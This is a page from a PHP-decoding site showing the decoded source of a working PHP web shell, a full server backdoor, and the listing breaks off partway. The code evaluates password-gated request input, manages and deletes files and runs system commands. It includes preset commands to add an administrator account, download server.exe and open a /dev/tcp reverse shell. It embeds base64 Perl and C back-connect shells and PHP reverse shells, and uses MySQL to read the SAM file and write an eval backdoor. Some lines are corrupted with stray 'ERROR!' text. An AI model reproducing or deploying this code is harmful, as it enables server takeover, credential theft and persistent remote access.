Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
php /tmp/BNL43pbbLb.php ob_start(); define('myaddress',$_SERVER['SCRIPT_FILENAME']); ..
Decoded Output download
php /tmp/BNL43pbbLb.php
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
if($_POST['postpass']){
if($_POST['postpass'] == postpass){
setcookie('postpass',md5($_POST['postpass']));
hmlogin();
}else{
echo '<CENTER></CENTER>';
}
}
islogin($shellname,$myurl);
exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
$dir = do_show($_GET['pack']);
$zip = new eanver($dir);
$out = $zip->out;
do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
css_main();
start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
setcookie('postpass',null);
die('<meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"" => array("upfiles" => "","phpinfo" => "","info_f" => "","phpcode" => "PHP"),
"" => array("sqlshell" => "SQL","mysql_exec" => "MYSQL","myexp" => "MYSQL","servu" => "Serv-U","cmd" => "","linux" => "","downloader" => "","port" => ""),
"" => array("guama" => "","tihuan" => "","scanfile" => "","scanphp" => ""),
"" => array("getcode" => "")
);
$msg = array("0" => "","1" => "","2" => "","3" => "","4" => "","5" => "","6" => "","7" => "");
css_main();
switch($eanver){
case "left":
css_left();
html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
html_img("title");html_n(" </a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
$ROOT_DIR = File_Mode();
html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'></a></li>");
html_n("<li><a href='?eanver=main' target='main'></a></li>");
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>($drive)</a></li>");}}
html_n("</ul></dd></dl>");
$i = 2;
foreach($class as $name => $array){
html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
foreach($array as $url => $value){
html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
}
html_n("</ul></dd></dl>");
$i++;
}
html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
html_img("title");html_n(" </a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
html_n("<li><a title='' href='?eanver=logout' target=\"main\"></a></li>");
html_n("</ul></dd></dl>");
html_n("</div>");
break;
case "main":
css_js("1");
$dir = @dir($path);
$REAL_DIR = File_Str(realpath($path));
if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
$NUM_D = $NUM_F = 0;
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$ROOT_DIR = File_Mode();
html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>:<input type='hidden' name='eanver' value='main'>");
html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value=''></form>");
html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
html_n("<input type=\"button\" value=\"\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
html_input("file","upfilet",""," ");
html_input("submit","uploadt","");
if(!empty($_POST['newfile'])){
if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
$newfile=base64_decode($_POST['newfile']);
if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];}
if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}}
echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1];
@touch($newfile,@strtotime($_POST['time']));
}
html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
html_a('?eanver=main&path='.uppath($path),'<b></b>');
html_n('</b></td><td align="center" width="10%"><b></b></td><td align="center" width="5%"><b></b></td>');
html_n('<td align="center" width="8%"><b>('.get_current_user().')|</b></td>');
html_n('<td align="center" width="10%"><b></b></td><td align="center" width="10%"><b></b></td></tr>');
while($dirs = @$dir->read()){
if($dirs == '.' or $dirs == '..') continue;
$dirpath = str_path("$path/$dirs");
if(is_dir($dirpath)){
$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
$dirpath = urlencode($dirpath);
html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
html_img("dir");
html_a('?eanver=main&path='.$dirpath,$dirs);
html_n('</td><td align="center">');
html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\"></a>");
html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\"></a> ");
html_a('?pack='.$dirpath,'');
html_n('</td><td align="center">');
html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs"));
html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
html_n('</td></tr>');
$NUM_D++;
}
}
@$dir->rewind();
while($files = @$dir->read()){
if($files == '.' or $files == '..') continue;
$filepath = str_path("$path/$files");
if(!is_dir($filepath)){
$fsize = @filesize($filepath);
$fsize = File_Size($fsize);
$perm = substr(base_convert(fileperms($filepath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
$todir=$ROOT_DIR.'/zipfile';
$filepath = urlencode($filepath);
$it=substr($filepath,-3);
html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
html_img(css_showimg($files));
html_a($Fileurls,$files,'target="_blank"');
html_n('</td><td align="center">');
if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
html_a('?unzip='.$filepath,'','title="'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
else
html_a('?eanver=editr&p='.$filepath,'','title="'.$files.'"');
html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\"></a>");
html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\"></a> ");
html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\"></a>");
html_n('</td><td align="center">');
html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files"));
html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
html_a('?down='.$filepath,$fsize,'title="'.$files.'"');
html_n('</td></tr>');
$NUM_F++;
}
}
@$dir->close();
if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
print<<<END
</table>
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined">
<input type="hidden" id="inver" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
<input type="button" value="" onclick="SubmitUrl(': ','{$REAL_DIR}','a');return false;">
<input type="button" value="" onclick="Delok('','b');return false;">
<input type="button" value="" onclick="SubmitUrl(': ','0666','c');return false;">
<input type="button" value="" onclick="CheckDate('{$Filetime}','d');return false;">
<input type="button" value="" onclick="SubmitUrl(': ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
({$NUM_D}) / ({$NUM_F})</div>
</form>
END;
break;
case "editr":
print<<<END
<script>
END;
html_base();
print<<<END
</script>
END;
css_js("2");
if(!empty($_POST['uploadt'])){
echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
}
if(!empty($_GET['redir'])){
$name=$_GET['name'];
$newdir = str_path($p.'/'.$name);
@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
}
if(!empty($_GET['refile'])){
$name=$_GET['name'];
$jspath=urlencode($p.'/'.$name);
$pp = urlencode($p);
$p = str_path($p.'/'.$name);
$FILE_CODE = "";
$charset= 'GB2312';
$FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
if(@file_exists($p)) echo '""<br>';
}else{
$jspath=urlencode($p);
$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
$FILE_CODE=@file_get_contents($p);
if (substr(PHP_VERSION,0,1)>=5){
if(empty($_GET['charset'])){
if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
}else{
if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
}
}
$FILE_CODE = htmlspecialchars($FILE_CODE);
}
print<<<END
<div class="actall">: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type="button" value="" onclick="search(searchs.value)"></div>
<form method='POST' id="editor" action='?eanver=main&path={$pp}'>
<div class="actall">
<input type="text" name="newfile" id="newfile" value="{$p}" style="width:750px;"><input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
<input type="button" value="" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;">
END;
html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
print<<<END
</div>
<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall"> <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>()</div>
<div class="actall"><input type="button" value="" onclick="CheckDate();" style="width:80px;"><input name='reset' type='reset' value=''>
<input type="button" value="" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
</form>
END;
break;
case "rename":
html_n("<tr><td>");
$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "deltree":
html_n("<tr><td>");
do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "del":
html_n("<tr><td>");
@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "copy":
html_n("<tr><td>");
$newpath = explode('/',$_GET['newcopy']);
$pathr[0] = $newpath[0];
for($i=1;$i < count($newpath);$i++){
$pathr[] = urlencode($newpath[$i]);
}
$newcopy = implode('/',$pathr);
@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "perm":
html_n("<form method='POST'><tr><td>".$p.' : ');
if(is_dir($p)){
html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
}else{
html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
}
html_input("submit","save","");
back();
if($_POST['class']){
switch($_POST['class']){
case "0777": $change = @chmod($p,0777); break;
case "0755": $change = @chmod($p,0755); break;
case "0555": $change = @chmod($p,0555); break;
case "0666": $change = @chmod($p,0666); break;
case "0644": $change = @chmod($p,0644); break;
case "0444": $change = @chmod($p,0444); break;
}
$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
}
html_n("</td></tr></form>");
break;
case "info_f":
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("",date("YmdERROR!
h:i:s",time())),
array("","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
array("IP",gethostbyname($_SERVER['SERVER_NAME'])),
array("",PHP_OS),
array("",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("",$_SERVER['SERVER_SOFTWARE']),
array("IP",$_SERVER["REMOTE_ADDR"]),
array("Web",$_SERVER['SERVER_PORT']),
array("PHP",strtoupper(php_sapi_name())),
array("PHP",PHP_VERSION),
array("",Info_Cfg("safemode")),
array("",$adminmail),
array("",myaddress),
array(" URL allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("curl_exec",Info_Fun("curl_exec")),
array(" enable_dl",Info_Cfg("enable_dl")),
array(" display_errors",Info_Cfg("display_errors")),
array(" register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array(" memory_limit",Info_Cfg("memory_limit")),
array("POST post_max_size",Info_Cfg("post_max_size")),
array(" upload_max_filesize",$upsize),
array(" max_execution_time",Info_Cfg("max_execution_time").""),
array(" disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array(" GD Library",Info_Fun("imageline")),
array("IMAP",Info_Fun("imap_close")),
array("MySQL",Info_Fun("mysql_close")),
array("SyBase",Info_Fun("sybase_close")),
array("Oracle",Info_Fun("ora_close")),
array("Oracle 8 ",Info_Fun("OCILogOff")),
array("PREL PCRE",Info_Fun("preg_match")),
array("PDF",Info_Fun("pdf_close")),
array("Postgre SQL",Info_Fun("pg_close")),
array("SNMP",Info_Fun("snmpget")),
array("(Zlib)",Info_Fun("gzclose")),
array("XML",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC",Info_Fun("odbc_close")),
array("Session",Info_Fun("session_start")),
array("Socket",Info_Fun("fsockopen")),
);
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '<table width="100%" border="0">';
for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
}catch(Exception $e){}
echo '<tr><td width="40%">Terminal Service</td><td>'.$registry_proxystring.'</td></tr>'."\n";
echo '<tr><td width="40%">Telnet</td><td>'.$Telnet.'</td></tr>'."\n";
echo '<tr><td width="40%">PcAnywhere</td><td>'.$PcAnywhere.'</td></tr>'."\n";
echo '</table>';
break;
case "cmd":
$res = '';
$cmd = 'dir';
if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));}
print<<<END
<script language="javascript">
function sFull(i){
Str = new Array(11);
Str[0] = "dir";
Str[1] = "net user envl envl /add";
Str[2] = "net localgroup administrators envl /add";
Str[3] = "netstat -ano";
Str[4] = "ipconfig";
Str[5] = "copy c:\\1.php d:\\2.php";
Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
Str[8] = "tasklist -svc";
document.getElementById('cmd').value = Str[i];
return true;
}
END;
html_base();
print<<<END
function SubmitUrl(){
document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
document.getElementById('gform').submit();
}
</script>
<form method="POST" name="gform" id="gform" ><center><div class="actall">BASE64</div><div class="actall">
<input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">
<input type="button" value="" onclick="SubmitUrl();" style="width:80px;">
</div>
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
</form>
END;
break;
case "linux":
$yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
$yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388';
$system=strtoupper(substr(PHP_OS, 0, 3));
print<<<END
<div class="actall"><br>
"nc -vv -l 12388"<br>
IP,NC</div>
<form method="POST" name="kform" id="kform">
<div class="actall"> <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
<div class="actall"> <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div>
<div class="actall"> <select name="use" >
<option value="perl">Perl</option>
<option value="c">C</option>
<option value="php">PHP</option>
<option value="nc">NC</option>
</select></div>
<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>
END;
if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
{
setcookie('yourip',$backip);
setcookie('yourport',$backport);
echo '<div class="actall">';
if($_POST['use'] == 'perl')
{
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/envl_bc<br>' : '/tmp/envl_bc<br>';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
@unlink('/tmp/envl_bc.c');
echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '';
}
if($_POST['use'] == 'c')
{
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIERROR!
GR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/envl_bc.c<br>' : '/tmp/envl_bc.c<br>';
$res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
@unlink('/tmp/envl_bc.c');
echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '';
}
if($_POST['use'] == 'php')
{
if(!extension_loaded('sockets'))
{
if ($system == 'WIN') {
@dl('php_sockets.dll') or die("Can't load socket");
}else{
@dl('sockets.so') or die("Can't load socket");
}
}
if($system=="WIN")
{
$env=array('path' => 'c:\\windows\\system32');
}else{
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
$descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
2 => array("pipe","w"),
);
$host = $_POST['yourip'];
$port = $_POST['yourport'];
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){
die("Socket");
}
if(($ret=socket_connect($sock,$host,$port))<0){
die("");
}else{
$message="----------------------PHP--------------------\n";
socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=socket_read($sock,65535,$proto)){
if(trim(strtolower($cmd))=="exit"){
socket_write($sock,"Bye\n");
exit;
}else{
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg=stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
$return_value = proc_close($process);
}
}
}
}
}
if($_POST['use'] == 'nc')
{
echo '<div class="actall">';
$mip=$_POST['yourip'];
$bport=$_POST['yourport'];
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}else {
fputs ($fp ,"\n*********************************************\n
hacking url:http://www.google.com is ok!
\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," [r00t@H4c3ing:/root]# ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
echo '</div>';
}
echo '<br> (nc -vv -l '.$_POST['yourport'].') ';
}
break;
case "sqlshell":
$MSG_BOX = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
else $MSG_BOX = 'MYSQL';
}
$downfile = 'c:/windows/repair/sam';
if(!empty($_POST['downfile']))
{
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x'.$binpath.')';
if($result = @mysql_query($query,$conn))
{
$k = 0; $downcode = '';
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
$filedown = basename($downfile);
if(!$filedown) $filedown = 'envl.tmp';
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: attachment; filename='.$filedown);
header('Content-Length: '.strlen($downcode));
echo $downcode;
exit;
}
else $MSG_BOX = '';
}
$o = isset($_GET['o']) ? $_GET['o'] : '';
print<<<END
<script language="javascript">
function nFull(i){
Str = new Array(11);
Str[0] = "select version();";
Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
return true;
}
END;
html_base();
print<<<END
function SubmitUrl(){
document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
document.getElementById('nform').submit();
}
</script>
<form method="POST" name="nform" id="nform">
<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL]</a>
<a href="?eanver=sqlshell&o=u">[MYSQL]</a>
<a href="?eanver=sqlshell&o=d">[MYSQL]</a></div>
<div class="actall">
<input type="text" name="mhost" value="{$mhost}" style="width:110px">
<input type="text" name="mport" value="{$mport}" style="width:110px">
<input type="text" name="muser" value="{$muser}" style="width:110px">
<input type="text" name="mpass" value="{$mpass}" style="width:110px">
<input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div>
<div class="actall" style="height:220px;">
END;
if($o == 'u')
{
$uppath = 'C:/Documents and Settings/All Users////exp.vbs';
if(!empty($_POST['uppath']))
{
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if(@mysql_query($query,$conn))
{
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
if(@mysql_query($query,$conn))
{
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '' : '';
}
else $MSG_BOX = '';
@mysql_query('Drop TABLE IF EXISTS a;',$conn);
}
else $MSG_BOX = '';
}
